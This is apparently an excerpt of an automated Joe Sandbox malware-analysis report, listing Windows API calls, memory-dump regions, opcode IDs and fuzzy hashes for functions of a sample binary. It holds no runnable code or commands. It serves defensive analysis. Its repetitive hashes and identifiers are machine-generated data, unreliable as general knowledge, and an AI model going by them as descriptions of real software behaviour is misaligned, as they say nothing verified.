                                                                                                    • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                    APIs
                                                                                                      • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                    • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                      • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InfoParametersSystem$ShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3202724764-0
                                                                                                    • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                    • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                    • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                    • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                    APIs
                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: TextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 530164218-0
                                                                                                    • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                    • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                    • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                    • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                    APIs
                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                    • String ID:
                                                                                                    • API String ID: 2492992576-0
                                                                                                    • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                    • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                    • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                    • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                    APIs
                                                                                                    • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 3188754299-0
                                                                                                    • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                    • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                    • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                    • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateFile
                                                                                                    • String ID:
                                                                                                    • API String ID: 823142352-0
                                                                                                    • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                    • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                    • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                    • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                    APIs
                                                                                                    • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                      • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 734332943-0
                                                                                                    • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                    • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                    • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                    • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                    APIs
                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CurrentDirectory
                                                                                                    • String ID:
                                                                                                    • API String ID: 1611563598-0
                                                                                                    • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                    • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                    • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                    • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                    • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                    • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                    • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DestroyWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3375834691-0
                                                                                                    • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                    • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                    • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                    • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                    • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                    • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                    • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                    APIs
                                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 4275171209-0
                                                                                                    • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                    • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                    • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                    • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1452528299-0
                                                                                                    • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                    • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                    • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                    • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                    APIs
                                                                                                    • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00000000,00004003,00401973), ref: 00401766
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 1263568516-0
                                                                                                    • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                    • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                    • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                    • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2962429428-0
                                                                                                    • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                    • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                    • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                    • Instruction Fuzzy Hash:
                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                    • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                    • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                    • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                    • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                    • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                    • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                    • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                    • API String ID: 2323315520-3614243559
                                                                                                    • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                    • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                    • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                    • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                    • QueryPerformanceCounter.KERNEL32(02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 00458638
                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(02113858,02113858), ref: 00458642
                                                                                                    • GetCurrentProcessId.KERNEL32(?,02113858,00000000,004588C2,?,?,02113858,00000000,?,00458FBE,?,02113858,00000000), ref: 0045864B
                                                                                                    • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02113858,02113858), ref: 004586CF
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                    • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                      • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
